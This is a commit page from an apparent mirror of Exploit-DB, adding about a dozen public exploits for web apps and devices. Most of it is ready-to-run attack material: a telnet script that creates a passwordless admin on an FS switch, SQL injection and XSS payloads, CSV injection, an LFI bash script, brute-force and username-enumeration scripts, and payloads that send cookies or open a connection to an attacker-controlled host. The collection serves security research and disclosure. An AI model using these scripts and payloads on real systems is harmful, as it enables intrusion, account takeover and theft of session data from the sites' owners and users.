bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-05-03

Browse source 
19 changes to exploits/shellcodes/ghdb

FS-S3900-24T4S - Privilege Escalation

Virtual Reception v1.0 - Web Server Directory Traversal

admidio v4.2.5 - CSV Injection

Companymaps v8.0 - Stored Cross Site Scripting (XSS)

GLPI 9.5.7 - Username Enumeration

OpenEMR v7.0.1 - Authentication credentials brute force

PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting

PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
PHPJabbers Simple CMS 5.0 - SQL Injection
PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)

phpMyFAQ v3.1.12 - CSV Injection

projectSend r1605 - Private file download

revive-adserver v5.4.1 - Cross-Site Scripting (XSS)

Serendipity 2.4.0 - File Inclusion RCE

SoftExpert (SE) Suite v2.1.3 - Local File Inclusion

Advanced Host Monitor v12.56 - Unquoted Service Path

MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
This commit is contained in:
Exploit-DB 2023-05-03 00:16:23 +00:00
parent 91a0e53b65
commit 668314bbda
19 changed files with 882 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

48
exploits/hardware/local/51414.py Executable file
View file

@ -0,0 +1,48 @@
# Exploit Title: FS-S3900-24T4S Privilege Escalation
# Date: 29/04/2023
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino
# Vendor Homepage: https://www.fs.com/
# Software Link: not available
# Version: latest
# Tested on: latest
# CVE : CVE-2023-30350
import sys
import telnetlib
def exploit(args):
print(args)
if len(args) != 1:
print(f"Usage: {sys.argv[0]} <ip>")
sys.exit(1)
else:
ip = args[0]
try:
with telnetlib.Telnet(ip, 23) as tn:
try:
tn.read_until(b"Username: ")
tn.write(b"guest\r\n")
tn.read_until(b"Password: ")
tn.write(b"guest\r\n")
tn.read_until(b">")
tn.write(b"enable\r\n")
tn.read_until(b"Password: ")
tn.write(b"super\r\n")
tn.read_until(b"#")
tn.write(b"configure terminal\r\n")
tn.read_until(b"(config)#")
tn.write(b"username admin nopassword\r\n")
tn.read_until(b"(config)#")
print(
"Exploit success, you can now login with username: admin and password: <empty>")
tn.close()
except KeyboardInterrupt:
print("Exploit failed")
tn.close()
except ConnectionRefusedError:
print("Connection refused")
if __name__ == "__main__":
exploit(sys.argv[1:])

1
exploits/multiple/webapps/51142.txt
View file

@ -3,6 +3,7 @@
# Vendor Homepage: https://www.virtualreception.nl/
# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY
# Tested on: all
# CVE-ID: CVE-2023-25289
We discovered the web server of the Virtual Reception appliance is prone to
an unauthenticated directory traversal vulnerability. This allows an

48
exploits/php/webapps/51398.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0
functions.php
function login(){
global $conn;
$email = $_POST['email'];
$pw = $_POST['password'];
$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` =
'".md5($pw)."'"; <-- there is No filter to secure sql query
parm[email][password]
$result = $conn->query($sql);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
header('location: index.php');
}
} else {
header('location: login.php?m=Wrong Password');
}
}
login bypass at admin page /rest1/admin/login.php
email & password : ' OR 1=1 -- <- add [space] end of the payload
cross site scripting main page /index.php
xhttp.open("GET", "functions.php?f=getRestaurants<?php
if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we
can insert our xss payload
?>
", true);
xhttp.send();
</script> <-- when you insert your'e payload don't forget to add </script>
like
xss payload : </script><img onerror=alert(1) src=a>

20
exploits/php/webapps/51399.txt Normal file
View file

@ -0,0 +1,20 @@
Exploit Title: phpMyFAQ v3.1.12 - CSV Injection
Application: phpMyFAQ
Version: 3.1.12
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.phpmyfaq.de/
Software Link: https://download.phpmyfaq.de/phpMyFAQ-3.1.12.zip
Date of found: 21.04.2023
Author: Mirabbas Ağalarov
Tested on: Windows
2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to user control panel and change name as =calc|a!z| and save
step 3. If admin Export users as CSV ,in The computer of admin occurs csv injection and will open calculator
payload: calc|a!z|
Poc video: https://youtu.be/lXwaexX-1uU

40
exploits/php/webapps/51400.txt Normal file
View file

@ -0,0 +1,40 @@
Exploit Title: projectSend r1605 - Private file download
Application: projectSend
Version: r1605
Bugs: IDOR
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 24-01-2023
Author: Mirabbas Ağalarov
Tested on: Linux
Technical Details & POC
========================================
1.Access to private files of any user, including admin
just change id
GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/manage-files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f
Connection: close

49
exploits/php/webapps/51401.txt Normal file
View file

@ -0,0 +1,49 @@
Exploit Title: revive-adserver v5.4.1 - Cross-Site Scripting (XSS)
Application: revive-adserver
Version: 5.4.1
Bugs: XSS
Technology: PHP
Vendor URL: https://www.revive-adserver.com/
Software Link: https://www.revive-adserver.com/download/
Date of found: 31-03-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to create banner
2. select the advanced section
3. Write this payload in the prepend and append parameters (%3Cscript%3Ealert%281%29%3C%2Fscript%3E)
POST /www/admin/banner-advanced.php HTTP/1.1
Host: localhost
Content-Length: 213
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sessionID=5224583cf474cd32d2ef37171c4d7894
Connection: close
clientid=3&campaignid=2&bannerid=2&token=94c97eabe1ada8e7ae8f204e2ebf7180&prepend=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&append=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitbutton=De%C4%9Fi%C5%9Fiklikleri+Kaydet
We are sending this link to the admin. then if admin clicks it will be exposed to xss
http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2

21
exploits/php/webapps/51402.txt Normal file
View file

@ -0,0 +1,21 @@
Exploit Title: admidio v4.2.5 - CSV Injection
Application: admidio
Version: 4.2.5
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.admidio.org/
Software Link: https://www.admidio.org/download.php
Date of found: 26.04.2023
Author: Mirabbas Ağalarov
Tested on: Windows
2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to My profile (edit profile) and set postal code as =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2)
step 3. If admin Export users as CSV or excell file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admidio/adm_program/modules/groups-roles/lists_show.php?rol_ids=2)
payload: =calc|a!z|
Poc video: https://www.youtube.com/watch?v=iygwj1izSMQ

67
exploits/php/webapps/51403.txt Normal file
View file

@ -0,0 +1,67 @@
## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE
## Author: nu11secur1ty
## Date: 04.26.2023
## Vendor: https://docs.s9y.org/index.html
## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
## Description:
The already authenticated attacker can upload HTML files on the
server, which is absolutely dangerous and STUPID
In this file, the attacker can be codding a malicious web-socket
responder that can connect with some nasty webserver somewhere. It
depends on the scenario, the attacker can steal every day very
sensitive information, for a very long period of time, until the other
users will know that something is not ok with this system, and they
decide to stop using her, but maybe they will be too late for this
decision.
STATUS: HIGH Vulnerability
[+]Exploit:
```HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>NodeJS WebSocket Server</title>
</head>
<body>
<h1>You have just sent a message to your attacker,<br>
<h1>that you are already connected to him.</h1>
<script>
const ws = new WebSocket("ws://attacker:8080");
ws.addEventListener("open", () =>{
console.log("We are connected to you");
ws.send("How are you, dear :)?");
});
ws.addEventListener('message', function (event) {
console.log(event.data);
});
</script>
</body>
</html>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0)
## Proof and Exploit:
[href](https://streamable.com/2s80z6)
## Time spend:
01:27:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <http://nu11secur1ty.com/>

60
exploits/php/webapps/51404.sh Executable file
View file

@ -0,0 +1,60 @@
# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion
# Date: 27-04-2023
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.softexpert.com/
# Version: 2.0 < 2.1.3
# Tested on: Kali Linux
# CVE : CVE-2023-30330
# SE Suite versions tested: 2.0.15.31, 2.0.15.115
# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330
#!/bin/bash
# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path>
target=$1
u=$2
p=$3
file=$(echo -n "$4"|base64 -w 0)
end="\033[0m\e[0m"
red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"
echo -e "\n$4 : $file\n"
echo -e "${blue}\nGETTING SESSION COOKIE${end}"
cookie=$(curl -i -s -k -X $'POST' \
-H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \
-b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \
--data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \
"https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)
echo "cookie: $cookie"
function LFI () {
curl -s -k -X $'POST' \
-H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \
-b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \
--data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \
"https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"
}
echo -e "${blue}\nExploiting LFI:${end}"
LFI
function logout () {
curl -i -s -k -X $'POST' \
-H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
-b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \
"https://$target/softexpert/selogout"
}
echo -e "${blue}\nLogging out${end}"
logout >/dev/null
echo -e "\n\nDone!"

100
exploits/php/webapps/51411.txt Normal file
View file

@ -0,0 +1,100 @@
Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
Application: PHPFusion
Version: 9.10.30
Bugs: XSS
Technology: PHP
Vendor URL: https://www.php-fusion.co.uk/home.php
Software Link: https://sourceforge.net/projects/php-fusion/
Date of found: 28-04-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)
2. upload malicious svg file
svg file content ===>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
poc request:
POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1
Host: localhost
Content-Length: 1198
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0
Connection: close
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="reqid"
187c77be8e52cf
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="cmd"
upload
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="target"
l1_Lw
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"
SVG_XSS.svg
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="mtime[]"
1681116842
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="overwrite"
0
------WebKitFormBoundaryxF2jB690PpLWInAA--
3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file(
http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)
poc video : https://youtu.be/6yBLnRH8pOY

90
exploits/php/webapps/51413.py Executable file
View file

@ -0,0 +1,90 @@
# Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force
# Date: 2023-04-28
# Exploit Author: abhhi (Abhishek Birdawade)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz
# Version: 7.0.1
# Tested on: Windows
'''
Example Usage:
- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt
'''
import requests
import sys
import argparse, textwrap
from pwn import *
#Expected Arguments
parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))
parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)")
parser.add_argument("-u","--username", help="Username to Bruteforce for.")
parser.add_argument("-ul","--userlist", help="Username Dictionary")
parser.add_argument("-p","--passlist", help="Password Dictionary")
args = parser.parse_args()
if len(sys.argv) < 2:
print (f"Exploit Usage: python3 exploitBF.py -h")
sys.exit(1)
# Variable
LoginPage = args.url
Username = args.username
Username_list = args.userlist
Password_list = args.passlist
log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')
def login(Username,Password):
session = requests.session()
r = session.get(LoginPage)
# Progress Check
process = log.progress('Brute Force')
#Specifying Headers Value
headerscontent = {
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Referer' : f"{LoginPage}",
'Origin' : f"{LoginPage}",
}
#POST REQ data
postreqcontent = {
'new_login_session_management' : 1,
'languageChoice' : 1,
'authUser' : f"{Username}",
'clearPass' : f"{Password}"
}
#Sending POST REQ
r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)
#Printing Username:Password
process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))
#Conditional loops
if 'Location' in r.headers:
if "/interface/main/tabs/main.php" in r.headers['Location']:
print()
log.info(f'SUCCESS !!')
log.success(f"Use Credential -> {Username}:{Password}")
sys.exit(0)
#Reading User.txt & Pass.txt files
if Username_list:
userfile = open(Username_list).readlines()
for Username in userfile:
Username = Username.strip()
passfile = open(Password_list).readlines()
for Password in passfile:
Password = Password.strip()
login(Username,Password)

46
exploits/php/webapps/51415.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux
### Steps to Reproduce ###
- Please login from this address:
https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin
- Click on the "Add Section" button.
- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the
"Section" box and save it.
- Boom! An alert message saying "Stored" will appear in front of you.
### PoC Request ###
POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
HTTP/1.1
Host: localhost
Cookie: pj_sid=PJ1.0.6199026527.1682777172;
pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1;
PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1;
pjd=7l9bb4ubmknrdbns46j7g5cqn7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
Origin: https://localhost
Referer:
https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T

40
exploits/php/webapps/51416.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux
### Request ###
GET
/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
HTTP/1.1
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/simplecms/preview.php?lid=1
Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;
_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;
pjd_simplecms=1; last_position=%2F
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
### Parameter & Payloads ###
Parameter: column (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)
THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)
END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload: action=pjActionGetFile&column=2 AND
EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT
(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

20
exploits/php/webapps/51417.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS)
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29983
*Steps to reproduce:*
1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter
In a real world case you would need to wait for the admin to log into the application and open the auditlog tab.
Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

59
exploits/php/webapps/51418.py Executable file
View file

@ -0,0 +1,59 @@
# Exploit Title: GLPI 9.5.7 - Username Enumeration
# Date: 04/29/2023
# Author: Rafael B.
# Vendor Homepage: https://glpi-project.org/pt-br/
# Affected Versions: GLPI version 9.1 <= 9.5.7
# Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz
import requests
from bs4 import BeautifulSoup
# Send a GET request to the page to receive the csrf token and the cookie session
response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')
# Parse the HTML using BeautifulSoup
soup = BeautifulSoup(response.content, 'html.parser')
# Find the input element with the CSRF token
csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})
# Extract the CSRF token if it exists
if csrf_input:
csrf_token = csrf_input['value']
# Extract the session cookie
session_cookie_value = None
if response.cookies:
session_cookie_value = next(iter(response.cookies.values()))
# Set the custom url where the GLPI recover password is located
url = "http://127.0.0.1:80/glpi/front/lostpassword.php"
headers = {"User-Agent": "Windows NT 10.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
# Open the email list file and read each line
with open('emails.txt', 'r') as f:
email_list = f.readlines()
# Loop through the email list and make a POST request for each email
for email in email_list:
email = email.strip()
data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token}
cookies = {"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value}
freq = requests.post(url, headers=headers, cookies=cookies, data=data)
# Do a new GET request to get the updated CSRF token and session cookie for the next iteration
response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')
soup = BeautifulSoup(response.content, 'html.parser')
csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})
if csrf_input:
csrf_token = csrf_input['value']
session_cookie_value = None
if response.cookies:
session_cookie_value = next(iter(response.cookies.values()))
# Parse the response and grep the match e-mails
soup = BeautifulSoup(freq.content, 'html.parser')
div_center = soup.find('div', {'class': 'center'})
Result = (f"Email: {email}, Result: {div_center.text.strip()}")
if "An email has been sent to your email address. The email contains information for reset your password." in Result:
print ("\033[1;32m Email Found! -> " + Result)

37
exploits/windows/local/51410.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
